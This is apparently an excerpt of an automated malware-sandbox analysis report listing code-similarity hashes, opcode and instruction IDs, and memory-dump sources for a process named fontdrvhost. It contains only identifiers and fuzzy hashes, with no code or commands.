                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bbfddfeaa267d28e729fe17836d91b92e0bd3b9bd0f8874342f7d7c21940379e
                                                                                                                                                                                              • Instruction ID: 3e904a1ee782e8682a63a6728544e646107bcce8e083584feaf364c0f1230cf8
                                                                                                                                                                                              • Opcode Fuzzy Hash: bbfddfeaa267d28e729fe17836d91b92e0bd3b9bd0f8874342f7d7c21940379e
                                                                                                                                                                                              • Instruction Fuzzy Hash: D801C431B1E68D9FE712DBB4C8601AD7BB0EF56710F1641F3D048DB1A2D93867498761
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 714471fff56ce20def6a3558a3d7a8dfdbd011c325099d38c26d087d45ce6373
                                                                                                                                                                                              • Instruction ID: 0755938b51bcd988cf4fc8c34f8630152b3e5c83ce88c4644a050fcd91be8845
                                                                                                                                                                                              • Opcode Fuzzy Hash: 714471fff56ce20def6a3558a3d7a8dfdbd011c325099d38c26d087d45ce6373
                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF049304593C54FC3029B74CC149927FE4EF4B118B4A42EAD4C9CB562D76C95468752
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e2804fdfcdb19d470f705a12d0aa0a24e155bcdff2af1aaaf6029f1a85358042
                                                                                                                                                                                              • Instruction ID: 0a4493e0b465880888e644230c24d33c6eecbec383fc0d44843363002eb8330c
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2804fdfcdb19d470f705a12d0aa0a24e155bcdff2af1aaaf6029f1a85358042
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07019E31A1E28D9FE712DBB4C86019D7BB0EF16714F1641F3D048DB2A2E9386B458791
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1829a01ef305f98acfdaf28004b7e9f1c6d53c5fe090f0bdca42241e57ada0e7
                                                                                                                                                                                              • Instruction ID: ec74ce7054023886e6dc1a78a34f2395082be601aaba7e08bda770079bd6ed33
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1829a01ef305f98acfdaf28004b7e9f1c6d53c5fe090f0bdca42241e57ada0e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA01C97094995E8FDFA8DF18C8A5FA8B7B1EB64301F1541EDD00EE3691DA31AA84CF41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7300a753986a4b978a08133f67d16be19fe705610716b044f626e424526f5509
                                                                                                                                                                                              • Instruction ID: d6f533c76d75c5e9b21102b503c6d72c7803b9c3d1827e312263448d7006ad59
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7300a753986a4b978a08133f67d16be19fe705610716b044f626e424526f5509
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6501BB70908A5DCFDF59DBA8C8A5AACBBF1FF69701F14019DC04AEB251CA31A941DF40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d8caf8b4335caa874dd406095c5ab38d54fcc980100e0e0c3e7b4039d594c7aa
                                                                                                                                                                                              • Instruction ID: 8d5ee2c8974429cc882c4f0a2e8beb8ec3f7ce62be2001f85c0156b8930cc1ec
                                                                                                                                                                                              • Opcode Fuzzy Hash: d8caf8b4335caa874dd406095c5ab38d54fcc980100e0e0c3e7b4039d594c7aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F0963155E3C9AFE3129BB088225E97FB9AF43614B1500E6E489CB0B2D52D1716C761
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f1b14372645c81eff3cf177c0f59ca5e2270dd761942fdc5cbcc389dc57d3379
                                                                                                                                                                                              • Instruction ID: 2769d522a5257fcce5726d6835abb193413c3fab21031d1ded393879bf62efd7
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b14372645c81eff3cf177c0f59ca5e2270dd761942fdc5cbcc389dc57d3379
                                                                                                                                                                                              • Instruction Fuzzy Hash: BF018F31E1E38D9FE712DBB488601AD7BB0EF1A714F1641E3D048CB2A2E9386B458751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction ID: 8f3c4e29e3218d286a2320cd147e8819a6e35d3431f55cad53f6d6b2dceab812
                                                                                                                                                                                              • Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F03630B1951E4EEB78AF94C9A4AF873A1FF48711F1601B9D48ED31B1DE386A818A10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 85b1b54eb6bdd577952cf64f063a2f634c99d02b0efff603760c35b10ca821c2
                                                                                                                                                                                              • Instruction ID: a925a99214e3815ee8e04b2587c0a9b77485c6e7285e875a6d5ceb6cb2f91a6e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85b1b54eb6bdd577952cf64f063a2f634c99d02b0efff603760c35b10ca821c2
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0FC3554F3CA9FE7228FB0C8615D87FF0EF43240B1A40FAE085C70A2D96C164A8711
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f6b0f03b737704dc0d337090b9d03963832a24f2f2b9615ae5c6b30785cf679f
                                                                                                                                                                                              • Instruction ID: c8fb3fff1d4b5a83d2a278d8f8afcbe038d3ecf0b345cc10e31766bc118fb30c
                                                                                                                                                                                              • Opcode Fuzzy Hash: f6b0f03b737704dc0d337090b9d03963832a24f2f2b9615ae5c6b30785cf679f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF0BE11B1F90F8EF73965A098322BD2200AF513C1F22043AD40EAB4FACE196A0193B1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0ffb668ec86854c0ad36b222779c4a69c77199020f791380851a6ec7cb2e62dc
                                                                                                                                                                                              • Instruction ID: c3fbf7feb1d9f74f119435de51aeff1c722f3a3199a85d2be4b8d0d07eb90f74
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ffb668ec86854c0ad36b222779c4a69c77199020f791380851a6ec7cb2e62dc
                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF0963645E3CA9FF3229BB088255DD7FE0EF03311F1500FAD485C70A2D66C164A8751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction ID: ce3496e082ee7735731b01ac1447c5979e161556ccb2a1851e2174fac6fc6218
                                                                                                                                                                                              • Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF05B31B1D40E4AEA78DF94C9A4AB93392FF88711F170175D48EE31F2DE287E418650
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 23b76e65ed5a87d46db7a046b4a8aa6059f24b48ffecfcff494aa6f119830948
                                                                                                                                                                                              • Instruction ID: b8435c08b2dd08b616ae4c186d0ce6d359c6b44fead09ed96a85b2a7664a9d0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 23b76e65ed5a87d46db7a046b4a8aa6059f24b48ffecfcff494aa6f119830948
                                                                                                                                                                                              • Instruction Fuzzy Hash: CEE06836609A0DCFDB00AF79CCD44D17B90FB0A71AFEA02AED148C7612E2215828CB04
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 01f8badefb1983083f185c487a6dc67bc8db93f6a36530a785f366378ca9e80a
                                                                                                                                                                                              • Instruction ID: e13ad2630cdcba8cf96be9b30ac480cf51ef58ecff30db03893218b047a65cd3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01f8badefb1983083f185c487a6dc67bc8db93f6a36530a785f366378ca9e80a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E09B3091D7058FE3789B64845D1757FE0EF1930171504FFD44DDB5B1EA3665808781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                                                                                                                              • Instruction ID: 8dd4feb82d04f1102d77f9502407a87e5b667889bf1912253eb43a3e0ec21458
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF0B27490A95D9FCB55EAA8C85AE99BBB0FF68300F10019DD00ADB262CA219945CF40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a2311c50a3f89907cd5dbcb33b462afd9622ffdb3d09168b0b9e3cbf4a4372bc
                                                                                                                                                                                              • Instruction ID: 8bafd2288f8cdce767e0348fdcfdbac0be8eee05fa86f289382132851b16de0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: a2311c50a3f89907cd5dbcb33b462afd9622ffdb3d09168b0b9e3cbf4a4372bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0A03170C4188FE72CEA14D8512B933A2EB80314F226279C05BC35D2DF39A6038740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 43cb86d6915d58e0ee49a7c26fd5934a3ebf95553d90f25407ed116a46207b79
                                                                                                                                                                                              • Instruction ID: e0fdbcdb939b28cd70a13a228ba132c465f427296efc6fd6f58f00185ef0b0ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43cb86d6915d58e0ee49a7c26fd5934a3ebf95553d90f25407ed116a46207b79
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F08C3080EB894FE37AA76448750707FF0DF2720071A04FBC18AC75B2E86969C98342
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                                                                                                                                                              • Instruction ID: 6c988dfbd83351cde7a75cc606598e7b6a0d165b3bf3804d998fac8910971834
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE0D841D5F74E06E61722BD54B609C7A141F9AA18F9A00B3C44D860B2B88D22990672
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction ID: 799bd24c2599b592bb6a3b5bf590a6f44821d7247ebad1ef3226a78a5e22d81a
                                                                                                                                                                                              • Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E01220F1A41E4AFB75A794C8707F96191AF9CB00F1A00B4D90DD32E2DD386F41CB51
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8739bf592d4791f7773102a35e2daa14b00fd453909f545a29fb6cf8cc694156
                                                                                                                                                                                              • Instruction ID: 3a1e7500b8f97c2a56d04fde585c38204680e201440a4abafa8259671508526b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8739bf592d4791f7773102a35e2daa14b00fd453909f545a29fb6cf8cc694156
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D01243F1F68A4AFB7901F0047206C0A805F1734074701BAD1968D2E7DD8CA9055325
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: eb82e2e70799356652c804c1d4e1e5f5261c82f7c7b5826759bf1a683002834e
                                                                                                                                                                                              • Instruction ID: 63354e1e5373f3cce49cecdc481aff3db1c3db759d079f382382217e8e5fc3e4
                                                                                                                                                                                              • Opcode Fuzzy Hash: eb82e2e70799356652c804c1d4e1e5f5261c82f7c7b5826759bf1a683002834e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09D05E83F2F38A5BFB3205B4087607C1A809F17340B4B0CB7D19ACE2E7DA8C2A454326
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction ID: 61a82a8a173822ad6cbb196ee21d2251885d850747f84f11fca81989d8f34839
                                                                                                                                                                                              • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC04C05F6B61F01F83577EE98A60ACA1405BDDF14FD71172D54D400F1AC4D22D90177
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction ID: e9f9372fbf982ea4d297a857402a0a94ca5ea82dec3110fee052764f1dcc8fcd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction Fuzzy Hash: AFC08C3051180D8FC948EB28C88480473A0FB0D300BC20090E408C7170D22ADCC1C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction ID: 4bf2e6fc272987765bad03551401c6f5706531bff79944a27e42e78464cd5699
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EC08C306118088FC900F72CC88480032A0FB0D210BC20190E00EC7174E21AAC80C700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 287d6b6090b85acd719f5b5807bbbf47d8bb6ec2b557018d5fdcd510fa50d3d1
                                                                                                                                                                                              • Instruction ID: 23f2c126f520d0dd4f740b13c2d3e645d0c9575c4461b6430aade6b2bc8692f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 287d6b6090b85acd719f5b5807bbbf47d8bb6ec2b557018d5fdcd510fa50d3d1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D0C964B4F68F85F57846E1407023E51906F84700F62403DD09F478E9CF1C7B02A206
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                                                                                                                              • Instruction ID: a9a0df7987011b3cacb54162c98b1c7c3a4ccd39e15979eb32f26e14ae1c8122
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74C04C303048189FD794DA5DC0D463873D1EF49301B5100B4E04ACF2B5C5289D499710
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ae8d5dcbb98faea331701bce19bcf64c78e81f0a553b061e27394d5df4298b6b
                                                                                                                                                                                              • Instruction ID: c47124e9910c5c09306e1bb60f68aa3b95d1bcc2492587cc7fe41aaa99378cd2
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae8d5dcbb98faea331701bce19bcf64c78e81f0a553b061e27394d5df4298b6b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29C00205F1881A06E66A6658587257E44829B45A08F990174E019D66CADD1C5E021286
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction ID: ed279b283bc7975634674f66e9f1098c809eb1f62e37847df7a92925c9bef6e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F0C02220E2800C00EB30A3B0C8223BA32002F28200F0B8AB3800EE20C2EC282A008080
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
